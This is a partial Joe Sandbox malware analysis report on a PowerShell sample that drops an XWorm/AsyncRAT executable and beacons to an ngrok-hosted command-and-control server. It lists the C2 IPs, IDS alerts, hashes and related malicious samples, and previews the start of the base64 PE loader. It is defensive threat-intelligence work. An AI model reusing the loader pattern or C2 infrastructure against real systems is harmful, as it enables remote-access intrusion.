                                  https://oneget.orgXpowershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3784517191.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://oneget.orgpowershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            3.126.37.18
                                            		2.tcp.eu.ngrok.ioUnited States
                                            		16509AMAZON-02USfalse
                                            3.127.138.57
                                            		unknownUnited States
                                            		16509AMAZON-02UStrue
                                            18.192.93.86
                                            		unknownUnited States
                                            		16509AMAZON-02USfalse
                                            18.157.68.73
                                            		unknownUnited States
                                            		16509AMAZON-02USfalse
                                            18.197.239.5
                                            		unknownUnited States
                                            		16509AMAZON-02USfalse

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1602905
                                            Start date and time:2025-01-30 10:34:10 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 1s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winPS1@4/6@6/5
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 52
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .ps1
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.242.39.171, 20.12.23.50
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 7700 because it is empty
                                            • Execution Graph export aborted for target tmpB20E.exe, PID 7928 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            04:35:17API Interceptor4x Sleep call for process: powershell.exe modified
                                            04:35:21API Interceptor14227572x Sleep call for process: tmpB20E.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3.126.37.18mod.exeGet hashmaliciousNjratBrowse
                                              Server.exeGet hashmaliciousNjratBrowse
                                                oiA5KmV0f0.exeGet hashmaliciousNjratBrowse
                                                  fBpY1pYq34.exeGet hashmaliciousNjratBrowse
                                                    f3aef511705f37f9792c6032b936ca61.exeGet hashmaliciousNjratBrowse
                                                      W9UAjNR4L6.exeGet hashmaliciousNjratBrowse
                                                        7zFM.exeGet hashmaliciousZTratBrowse
                                                          4xKDL5YCfQ.exeGet hashmaliciousNjratBrowse
                                                            b8UsrDOVGV.exeGet hashmaliciousNjratBrowse
                                                              tiodtk2cfy.exeGet hashmaliciousNjratBrowse
                                                                3.127.138.57mod.exeGet hashmaliciousNjratBrowse
                                                                  Server.exeGet hashmaliciousNjratBrowse
                                                                    Discord.exeGet hashmaliciousAsyncRATBrowse
                                                                      f3aef511705f37f9792c6032b936ca61.exeGet hashmaliciousNjratBrowse
                                                                        En3e396wX1.exeGet hashmaliciousNjratBrowse
                                                                          ea1Wv7aq.posh.ps1Get hashmaliciousMetasploitBrowse
                                                                            R3ov8eFFFP.exeGet hashmaliciousNjratBrowse
                                                                              b8UsrDOVGV.exeGet hashmaliciousNjratBrowse
                                                                                2G8CgDVl3K.exeGet hashmaliciousNjratBrowse
                                                                                  tiodtk2cfy.exeGet hashmaliciousNjratBrowse
                                                                                    18.192.93.86P90GT_Invoice_Related_Property_Tax_P800.exeGet hashmaliciousRedLineBrowse
                                                                                    • 2.tcp.eu.ngrok.io:17685/
                                                                                    http://www.sdrclm.cn/vendor/phpdocumentor/P800/P90GT_Invoice_Related_Property_Tax_P800.exeGet hashmaliciousRedLineBrowse
                                                                                    • 2.tcp.eu.ngrok.io:17685/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    2.tcp.eu.ngrok.iomod.exeGet hashmaliciousNjratBrowse
                                                                                    • 18.157.68.73
                                                                                    Server.exeGet hashmaliciousNjratBrowse
                                                                                    • 3.127.138.57
                                                                                    Discord.exeGet hashmaliciousAsyncRATBrowse
                                                                                    • 18.156.13.209
                                                                                    oiA5KmV0f0.exeGet hashmaliciousNjratBrowse
                                                                                    • 3.126.37.18
                                                                                    7166_output.vbsGet hashmaliciousAsyncRATBrowse
                                                                                    • 18.156.13.209
                                                                                    fBpY1pYq34.exeGet hashmaliciousNjratBrowse
                                                                                    • 18.157.68.73
                                                                                    f3aef511705f37f9792c6032b936ca61.exeGet hashmaliciousNjratBrowse
                                                                                    • 3.126.37.18
                                                                                    W9UAjNR4L6.exeGet hashmaliciousNjratBrowse
                                                                                    • 3.126.37.18
                                                                                    ULNZPn6D33.exeGet hashmaliciousSliverBrowse
                                                                                    • 18.197.239.5
                                                                                    Injector.exeGet hashmaliciousZTratBrowse
                                                                                    • 18.197.239.5

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    AMAZON-02USfabd6ab15a0540d197f1ceaa312308b8.ps1Get hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    1.vbsGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 54.171.230.55
                                                                                    SOA OF DEC 2024 PT.BINEX.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 3.161.119.33
                                                                                    SERVED SUMMON LETTER 01-30-2025.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.248.243.5
                                                                                    contract update.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Updated 2025 Trading Agreement for Direct Purchase account.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Bank Slip pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    AMAZON-02USfabd6ab15a0540d197f1ceaa312308b8.ps1Get hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    1.vbsGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 54.171.230.55
                                                                                    SOA OF DEC 2024 PT.BINEX.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 3.161.119.33
                                                                                    SERVED SUMMON LETTER 01-30-2025.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.248.243.5
                                                                                    contract update.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Updated 2025 Trading Agreement for Direct Purchase account.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Bank Slip pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    AMAZON-02USfabd6ab15a0540d197f1ceaa312308b8.ps1Get hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    1.vbsGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 54.171.230.55
                                                                                    SOA OF DEC 2024 PT.BINEX.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 3.161.119.33
                                                                                    SERVED SUMMON LETTER 01-30-2025.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.248.243.5
                                                                                    contract update.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Updated 2025 Trading Agreement for Direct Purchase account.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Bank Slip pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    AMAZON-02USfabd6ab15a0540d197f1ceaa312308b8.ps1Get hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    1.vbsGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 3.17.10.250
                                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 54.171.230.55
                                                                                    SOA OF DEC 2024 PT.BINEX.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 3.161.119.33
                                                                                    SERVED SUMMON LETTER 01-30-2025.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.248.243.5
                                                                                    contract update.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Updated 2025 Trading Agreement for Direct Purchase account.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    Bank Slip pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1628158735648508
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nllluldhz/lL:NllU
                                                                                    MD5:03744CE5681CB7F5E53A02F19FA22067
                                                                                    SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                                                    SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                                                    SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:@...e.................................L..............@..........

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdtqpgsd.w2q.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yicbr5fo.qzl.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\tmpB20E.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33280
                                                                                    Entropy (8bit):5.595778394593736
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:xlRmhGD91SluSWhnHHxzLmYV3Tm2eaFOL1dRApkFTBLTsOZwpGd2v99IkuisfVFR:TRPD9OQhx/BV3Tw4e1dVFE9jSOjhwb7
                                                                                    MD5:F5302ED0307CE30D226D50A45A0DCA9D
                                                                                    SHA1:9C9F6BA6ED092FFDCECF6DE13E9E618CE26FF2F5
                                                                                    SHA-256:497F32EB65C30742069CE49A41270EAB82D3A5CD1E36958E3608304F53507A0F
                                                                                    SHA-512:0E9DFE2087B9E76B6504C26ACA0C13CAF72BBD459F1ACA1439805D8CE5D2A554DF8143818F984F526D64BDE4EA271CD87BEF9E0446822E64C063369C10DA5B92
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Joe Security
                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Sekoia.io
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: Virustotal, Detection: 72%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.g.................x............... ........@.. ....................................@.................................D...W.................................................................................... ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H.......,O...H............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2D4RMKJK418TDMXJF067.temp

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6225
                                                                                    Entropy (8bit):3.733655320231587
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:W/S2W0bHCXU20MQzukvhkvklCywi98ijYIl6TsSogZowJAJad8ijYIllTsSogZog:eWsHCEr5ykvhkvCCtBcYI2JHycYIDJH9
                                                                                    MD5:16C804C6915EAB8CC5392F1CDE971F51
                                                                                    SHA1:FF803AF50F33F76DA0CC5490A94930DAF5226AA6
                                                                                    SHA-256:1729C7146E6529EA756E2392FDE80C3A2188D596122D92A39EBF56A10C04C639
                                                                                    SHA-512:7F317726577BAA7ED5F5ED0C559579E3E52AA3A2353EA9E5466BCB36BE469F6520981280C4624EAC4F760C5EF8085C1923626063EB13AABB0FF74447A50B93F3
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. .....*_...%.iD.r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......?.r....D.r......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=>ZgL..........................3*N.A.p.p.D.a.t.a...B.V.1.....>ZdL..Roaming.@......EW.=>ZdL..........................F.'.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=>ZbL..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=>ZbL..........................f.i.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=>ZbL....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=>ZbL....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=>ZhL....9...........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6225
                                                                                    Entropy (8bit):3.733655320231587
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:W/S2W0bHCXU20MQzukvhkvklCywi98ijYIl6TsSogZowJAJad8ijYIllTsSogZog:eWsHCEr5ykvhkvCCtBcYI2JHycYIDJH9
                                                                                    MD5:16C804C6915EAB8CC5392F1CDE971F51
                                                                                    SHA1:FF803AF50F33F76DA0CC5490A94930DAF5226AA6
                                                                                    SHA-256:1729C7146E6529EA756E2392FDE80C3A2188D596122D92A39EBF56A10C04C639
                                                                                    SHA-512:7F317726577BAA7ED5F5ED0C559579E3E52AA3A2353EA9E5466BCB36BE469F6520981280C4624EAC4F760C5EF8085C1923626063EB13AABB0FF74447A50B93F3
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. .....*_...%.iD.r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......?.r....D.r......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=>ZgL..........................3*N.A.p.p.D.a.t.a...B.V.1.....>ZdL..Roaming.@......EW.=>ZdL..........................F.'.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=>ZbL..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=>ZbL..........................f.i.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=>ZbL....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=>ZbL....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=>ZhL....9...........

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:ASCII text, with very long lines (44431), with CRLF line terminators
                                                                                    Entropy (8bit):4.9578052016755425
                                                                                    TrID:
                                                                                      File name:20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1
                                                                                      File size:45'430 bytes
                                                                                      MD5:ac45d57d6196e0eb21f4136002fd645d
                                                                                      SHA1:d3d32e7473079db2dbbf959c887a16e87a22894c
                                                                                      SHA256:52f1718467ed6617713e995fb1ad595f9040247df74acb489285a00212f7ff7d
                                                                                      SHA512:8ce3075dff3468f72b199b07b87b328c727fd2c9eb0b6ef6d0709040069b5261ce60afae1a24c5cc2a401eb359c4b04011b56f50e4f521ef7ee0337520f6c11e
                                                                                      SSDEEP:768:rqd0pgY5FOZdrLIIz+YrZJLlNeDGjR5TGcygxl92eeG:u2SxdrLII+0XhLjHGcyulkeeG
                                                                                      TLSH:7A135A374922FCD1BB7F2D90F5043A651C88342787A98678FBC4095A38B6250DF6ADF8
                                                                                      File Content Preview:..$arquivo_bytes = [System.Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADHMkmcAAAAAAAAAAOAA

                                                                                      File Icon

                                                                                      Icon Hash:3270d6baae77db44

                                                                                      Network Behavior

                                                                                      Download Network PCAP: filteredfull

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-30T10:36:31.828608+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.7576523.127.138.5710901TCP
                                                                                      2025-01-30T10:36:48.589330+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.7576553.127.138.5710901TCP

                                                                                      Network Port Distribution

                                                                                      • Total Packets: 303
                                                                                      • 10901 undefined
                                                                                      • 53 (DNS)
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 30, 2025 10:35:21.990950108 CET4972510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:21.997144938 CET10901497253.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:21.997221947 CET4972510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:22.240994930 CET4972510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:22.245821953 CET10901497253.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:23.613183022 CET10901497253.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:23.613331079 CET4972510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:26.229598045 CET4972510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:26.231295109 CET4975210901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:26.234390020 CET10901497253.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:26.236099005 CET10901497523.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:26.236350060 CET4975210901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:26.251430035 CET4975210901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:26.256172895 CET10901497523.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:27.894623995 CET10901497523.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:27.894720078 CET4975210901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:30.122191906 CET4975210901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:30.126604080 CET4978010901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:30.128134012 CET10901497523.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:30.132461071 CET10901497803.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:30.132554054 CET4978010901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:30.182240963 CET4978010901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:30.187037945 CET10901497803.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:31.755564928 CET10901497803.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:31.755655050 CET4978010901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:34.650415897 CET4978010901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:34.654441118 CET4980810901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:34.655200005 CET10901497803.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:34.659317970 CET10901498083.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:34.659389973 CET4980810901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:34.900612116 CET4980810901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:34.905441999 CET10901498083.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:36.266134977 CET10901498083.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:36.266745090 CET4980810901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:38.526618958 CET4980810901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:38.528335094 CET4983410901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:38.531421900 CET10901498083.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:38.533159018 CET10901498343.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:38.533509016 CET4983410901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:38.548571110 CET4983410901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:38.553311110 CET10901498343.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:40.162693977 CET10901498343.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:40.162945986 CET4983410901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:42.901607990 CET4983410901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:42.902971983 CET4986510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:42.906457901 CET10901498343.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:42.907959938 CET10901498653.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:42.908046007 CET4986510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:42.923887014 CET4986510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:42.930419922 CET10901498653.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:44.524271011 CET10901498653.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:44.524389982 CET4986510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:47.286498070 CET4986510901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:47.291517019 CET10901498653.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:47.297401905 CET4989110901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:47.302238941 CET10901498913.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:47.302321911 CET4989110901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:47.604543924 CET4989110901192.168.2.73.126.37.18
                                                                                      Jan 30, 2025 10:35:47.609328032 CET10901498913.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:48.943802118 CET5755653192.168.2.7162.159.36.2
                                                                                      Jan 30, 2025 10:35:48.948596001 CET5357556162.159.36.2192.168.2.7
                                                                                      Jan 30, 2025 10:35:48.951186895 CET5755653192.168.2.7162.159.36.2
                                                                                      Jan 30, 2025 10:35:48.956265926 CET5357556162.159.36.2192.168.2.7
                                                                                      Jan 30, 2025 10:35:48.964245081 CET10901498913.126.37.18192.168.2.7
                                                                                      Jan 30, 2025 10:35:48.966569901 CET4989110901192.168.2.73.126.37.18
